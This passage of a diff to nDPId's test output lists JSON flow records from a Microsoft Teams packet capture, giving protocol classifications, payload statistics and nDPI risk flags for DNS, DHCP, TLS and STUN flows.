-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": 
{"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041672419,"flow_last_seen":1587041697427,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":1674,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": 
{"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
